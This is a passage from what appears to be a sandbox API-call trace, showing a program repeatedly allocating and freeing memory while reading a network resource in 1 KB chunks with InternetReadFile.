(lpAddress=0x4ba0000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ba0000 [0123.434] VirtualFree (lpAddress=0x4b9c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.443] VirtualFree (lpAddress=0x4b5c000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.445] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.445] VirtualFree (lpAddress=0x4b98000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.446] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.451] VirtualFree (lpAddress=0x4ba0000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.455] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.455] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.455] VirtualAlloc (lpAddress=0x4b60000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b60000 [0123.460] VirtualFree (lpAddress=0x4b20000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.463] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.463] VirtualAlloc (lpAddress=0x4ba0000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ba0000 [0123.465] VirtualFree (lpAddress=0x4b9c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.471] VirtualFree (lpAddress=0x4b5c000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.473] VirtualFree (lpAddress=0x4b98000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.474] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.479] VirtualFree (lpAddress=0x4ba0000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.483] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.483] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.483] VirtualAlloc (lpAddress=0x4b60000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b60000 [0123.487] VirtualFree (lpAddress=0x4b20000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.498] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.498] VirtualAlloc (lpAddress=0x4ba0000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ba0000 [0123.502] VirtualFree (lpAddress=0x4b5c000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.504] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.505] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.509] VirtualFree (lpAddress=0x4b9c000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.513] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.514] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.516] VirtualAlloc (lpAddress=0x4b60000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b60000 [0123.521] VirtualFree (lpAddress=0x4b20000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.525] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.525] VirtualAlloc (lpAddress=0x4ba0000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ba0000 [0123.531] VirtualFree (lpAddress=0x4b5c000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.533] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.534] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.539] VirtualFree (lpAddress=0x4b9c000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.627] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.627] VirtualAlloc (lpAddress=0x4b60000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b60000 [0123.627] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.629] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.632] VirtualAlloc (lpAddress=0x4b64000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b64000 [0123.637] VirtualFree (lpAddress=0x4b20000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.640] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.641] VirtualAlloc (lpAddress=0x4ba8000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ba8000 [0123.642] VirtualFree (lpAddress=0x4ba4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.647] VirtualFree (lpAddress=0x4b60000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.649] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.650] VirtualFree (lpAddress=0x4ba0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.650] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.654] VirtualFree (lpAddress=0x4ba8000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.658] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.659] VirtualFree (lpAddress=0x4be8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.659] VirtualAlloc (lpAddress=0x4b64000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b64000 [0123.664] VirtualFree (lpAddress=0x4b20000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.668] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.668] VirtualAlloc (lpAddress=0x4ba8000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ba8000 [0123.669] VirtualFree (lpAddress=0x4ba4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.677] VirtualFree (lpAddress=0x4b60000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.680] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.680] VirtualFree (lpAddress=0x4ba0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.680] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.685] VirtualFree (lpAddress=0x4ba8000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.688] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.689] VirtualFree (lpAddress=0x4be8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.689] VirtualAlloc (lpAddress=0x4b64000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b64000 [0123.694] VirtualFree (lpAddress=0x4b20000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.697] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.697] VirtualAlloc (lpAddress=0x4ba8000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ba8000 [0123.698] VirtualFree (lpAddress=0x4ba4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.705] VirtualFree (lpAddress=0x4b60000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.706] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.706] VirtualFree (lpAddress=0x4ba0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.707] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.711] VirtualFree (lpAddress=0x4ba8000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.715] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.715] VirtualFree (lpAddress=0x4be8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.716] VirtualAlloc (lpAddress=0x4b64000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b64000 [0123.720] VirtualFree (lpAddress=0x4b20000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.724] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.724] VirtualAlloc (lpAddress=0x4ba8000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ba8000 [0123.729] VirtualFree (lpAddress=0x4b60000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0123.731] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.731] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.736] VirtualFree (lpAddress=0x4ba4000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0123.740] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.740] VirtualFree (lpAddress=0x4be8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.742] VirtualAlloc (lpAddress=0x4b64000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b64000 [0123.747] VirtualFree (lpAddress=0x4b20000, dwSize=0x40000, dwFreeType=0x4000) returned 1 [0123.751] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.751] VirtualAlloc (lpAddress=0x4ba8000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ba8000 [0123.757] VirtualFree (lpAddress=0x4b60000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0123.759] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.760] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.765] VirtualFree (lpAddress=0x4ba4000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0123.769] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.770] VirtualAlloc (lpAddress=0x4b64000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b64000 [0123.770] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.771] VirtualFree (lpAddress=0x4be8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.774] VirtualAlloc (lpAddress=0x4b68000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b68000 [0123.781] VirtualFree (lpAddress=0x4b20000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0123.786] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.786] VirtualAlloc (lpAddress=0x4bb0000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bb0000 [0123.788] VirtualFree (lpAddress=0x4bac000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.797] VirtualFree (lpAddress=0x4b64000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0123.800] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.800] VirtualFree (lpAddress=0x4ba8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.801] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.809] VirtualFree (lpAddress=0x4bb0000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0123.813] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.814] VirtualFree (lpAddress=0x4bf4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.814] VirtualAlloc (lpAddress=0x4b68000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b68000 [0123.821] VirtualFree (lpAddress=0x4b20000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0123.825] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.825] VirtualAlloc (lpAddress=0x4bb0000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bb0000 [0123.826] VirtualFree (lpAddress=0x4bac000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.838] VirtualFree (lpAddress=0x4b64000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0123.841] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.842] VirtualFree (lpAddress=0x4ba8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.842] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.853] VirtualFree (lpAddress=0x4bb0000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0123.858] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.858] VirtualFree (lpAddress=0x4bf4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.859] VirtualAlloc (lpAddress=0x4b68000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b68000 [0123.868] VirtualFree (lpAddress=0x4b20000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0123.890] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.891] VirtualAlloc (lpAddress=0x4bb0000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bb0000 [0123.892] VirtualFree (lpAddress=0x4bac000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.900] VirtualFree (lpAddress=0x4b64000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0123.902] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.903] VirtualFree (lpAddress=0x4ba8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.903] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.910] VirtualFree (lpAddress=0x4bb0000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0123.915] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.915] VirtualFree (lpAddress=0x4bf4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.915] VirtualAlloc (lpAddress=0x4b68000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b68000 [0123.921] VirtualFree (lpAddress=0x4b20000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0123.925] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.926] VirtualAlloc (lpAddress=0x4bb0000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bb0000 [0123.931] VirtualFree (lpAddress=0x4b64000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.028] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.028] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.034] VirtualFree (lpAddress=0x4bac000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.039] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.040] VirtualFree (lpAddress=0x4bf4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.044] VirtualAlloc (lpAddress=0x4b68000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b68000 [0124.049] VirtualFree (lpAddress=0x4b20000, dwSize=0x44000, dwFreeType=0x4000) returned 1 [0124.053] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.054] VirtualAlloc (lpAddress=0x4bb0000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bb0000 [0124.059] VirtualFree (lpAddress=0x4b64000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.062] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.067] VirtualFree (lpAddress=0x4bac000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.071] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.071] VirtualAlloc (lpAddress=0x4b68000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b68000 [0124.072] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.072] VirtualFree (lpAddress=0x4bf4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.075] VirtualAlloc (lpAddress=0x4b6c000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b6c000 [0124.080] VirtualFree (lpAddress=0x4b20000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.085] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.085] VirtualAlloc (lpAddress=0x4bb8000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bb8000 [0124.087] VirtualFree (lpAddress=0x4bb4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.094] VirtualFree (lpAddress=0x4b68000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.097] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.097] VirtualFree (lpAddress=0x4bb0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.098] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.103] VirtualFree (lpAddress=0x4bb8000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.107] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.108] VirtualFree (lpAddress=0x4c00000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.108] VirtualAlloc (lpAddress=0x4b6c000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b6c000 [0124.115] VirtualFree (lpAddress=0x4b20000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.119] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.124] VirtualAlloc (lpAddress=0x4bb8000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bb8000 [0124.125] VirtualFree (lpAddress=0x4bb4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.133] VirtualFree (lpAddress=0x4b68000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.137] VirtualFree (lpAddress=0x4bb0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.137] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0124.144] VirtualFree (lpAddress=0x4bb8000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.149] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.149] VirtualFree (lpAddress=0x4c00000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.149] VirtualAlloc (lpAddress=0x4b6c000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b6c000 [0124.156] VirtualFree (lpAddress=0x4b20000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.160] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0124.160] VirtualAlloc (lpAddress=0x4bb8000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4bb8000 [0124.162] VirtualFree (lpAddress=0x4bb4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0124.171] VirtualFree (lpAddress=0x4b68000, dwSize=0x48000, dwFreeType=0x4000) returned 1 [0124.174] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: 